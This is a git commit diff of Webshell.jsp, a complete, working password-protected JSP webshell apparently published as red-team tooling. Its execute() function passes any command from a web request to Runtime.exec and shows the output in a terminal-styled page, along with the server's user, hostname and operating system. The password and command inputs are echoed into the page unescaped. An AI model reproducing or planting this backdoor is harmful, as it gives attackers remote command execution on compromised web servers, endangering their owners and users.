Webshell.jsp updated

This commit is contained in:
mgeeky 2019-06-28 12:37:49 +02:00
parent 685a6428ed
commit f0f68868f3


@ -5,79 +5,79 @@
<%! <%!
// ===================================================================== // =====================================================================
// Setup global password necessary to pass before using that webshell. // Setup global password necessary to pass before using that webshell.
public String HardcodedPassword = "5eQzrXZHZwJNLvm6Q2b7PR6r"; public String HardcodedPassword = "5eQzrXZHZwJNLvm6Q2b7PR6r";
// ===================================================================== // =====================================================================
public String execute(String pass, String cmd, Boolean skip) { public String execute(String pass, String cmd, Boolean skip) {
StringBuilder res = new StringBuilder(); StringBuilder res = new StringBuilder();
if (cmd != null && cmd.length() > 0 && ((skip) || (pass.equals(HardcodedPassword) || HardcodedPassword.toLowerCase().equals("none")))){ if (cmd != null && cmd.length() > 0 && ((skip) || (pass.equals(HardcodedPassword) || HardcodedPassword.toLowerCase().equals("none")))){
try { try {
Process proc = Runtime.getRuntime().exec(cmd); Process proc = Runtime.getRuntime().exec(cmd);
OutputStream outs = proc.getOutputStream(); OutputStream outs = proc.getOutputStream();
InputStream ins = proc.getInputStream(); InputStream ins = proc.getInputStream();
DataInputStream datains = new DataInputStream(ins); DataInputStream datains = new DataInputStream(ins);
String datainsline = datains.readLine(); String datainsline = datains.readLine();
while ( datainsline != null) { while ( datainsline != null) {
res.append(datainsline + "<br/>"); res.append(datainsline + "<br/>");
datainsline = datains.readLine(); datainsline = datains.readLine();
} }
} catch( IOException e) { } catch( IOException e) {
return "IOException: " + e.getMessage(); return "IOException: " + e.getMessage();
} }
} }
else { else {
return "Wrong password or no command issued."; return "Wrong password or no command issued.";
} }
String out = res.toString(); String out = res.toString();
if (out != null && out.length() > 5 && out.indexOf("<br/>") != -1) { if (out != null && out.length() > 5 && out.indexOf("<br/>") != -1) {
out = out.substring(0, out.length() - 5); out = out.substring(0, out.length() - 5);
} }
out = out.replaceAll("(\r\n|\n\r|\n|\r)", "<br/>"); out = out.replaceAll("(\r\n|\n\r|\n|\r)", "<br/>");
return out; return out;
} }
%><!DOCTYPE html> %><!DOCTYPE html>
<html> <html>
<head> <head>
<title>JSP Application</title> <title>JSP Application</title>
</head> </head>
<body> <body>
<h3>Authenticated JSP Webshell.</h3> <h3>Authenticated JSP Webshell.</h3>
<i style="font-size:12px">You need to provide a valid password in order to leverage this application.</i> <i style="font-size:12px">You need to provide a valid password in order to leverage this application.</i>
<br/> <br/>
<font style="font-size:5px" style="font-style:italic;color:grey">coded by <a href="https://github.com/mgeeky">mgeeky</a></font> <font style="font-size:5px" style="font-style:italic;color:grey">coded by <a href="https://github.com/mgeeky">mgeeky</a></font>
<br/> <br/>
<hr/> <hr/>
<form method=post> <form method=post>
<table style="width:100%; font-size: 12px"> <table style="width:100%; font-size: 12px">
<tr> <tr>
<td>OS:</td><td style="width:100%"> <td>OS:</td><td style="width:100%">
<% out.print(System.getProperty("os.name")); %> <% out.print(System.getProperty("os.name")); %>
</td> </td>
</tr> </tr>
<tr> <tr>
<td><b style="color:red; font-size:10px">Password:</b></td><td style="width:90%"><input type=password width=40 name="password" value='<% out.print((request.getParameter("password") != null) ? request.getParameter("password") : ""); %>' /></td> <td><b style="color:red; font-size:10px">Password:</b></td><td style="width:90%"><input type=password width=40 name="password" value='<% out.print((request.getParameter("password") != null) ? request.getParameter("password") : ""); %>' /></td>
</tr> </tr>
<tr> <tr>
<td><b style="color:blue; font-size:11px"><% out.print(execute("", "whoami", true) + "@" + execute("", "hostname", true));%></b></td><td style="width:90%"><input type=text size=100 name="cmd" value='<% out.print((request.getParameter("cmd") != null) ? request.getParameter("cmd") : "uname -a"); %>' onClick="" onkeydown="if (event.keyCode == 13) { this.form.submit(); return false; }" /></td> <td><b style="color:blue; font-size:11px"><% out.print(execute("", "whoami", true) + "@" + execute("", "hostname", true));%></b></td><td style="width:90%"><input type=text size=100 name="cmd" value='<% out.print((request.getParameter("cmd") != null) ? request.getParameter("cmd") : "uname -a"); %>' onClick="" onkeydown="if (event.keyCode == 13) { this.form.submit(); return false; }" /></td>
</tr> </tr>
<tr> <tr>
<td><input type=submit style="position:absolute;left:-9999px;width:1px;height:1px;" tabindex="-1"/></td><td></td> <td><input type=submit style="position:absolute;left:-9999px;width:1px;height:1px;" tabindex="-1"/></td><td></td>
</tr> </tr>
</table> </table>
</form> </form>
<hr /> <hr />
<pre style="background-color:black;color:lightgreen;padding: 5px 25px 25px 25px;"><% <pre style="background-color:black;color:lightgreen;padding: 5px 25px 25px 25px;"><%
if (request.getParameter("cmd") != null && request.getParameter("password") != null) { if (request.getParameter("cmd") != null && request.getParameter("password") != null) {
out.println("<br/>server$ " + request.getParameter("cmd") + "<br/>"); out.println("<br/>server$ " + request.getParameter("cmd") + "<br/>");
out.println(execute(request.getParameter("password"), request.getParameter("cmd"), false)); out.println(execute(request.getParameter("password"), request.getParameter("cmd"), false));
} }
%></pre> %></pre>
</body> </body>
</html> </html>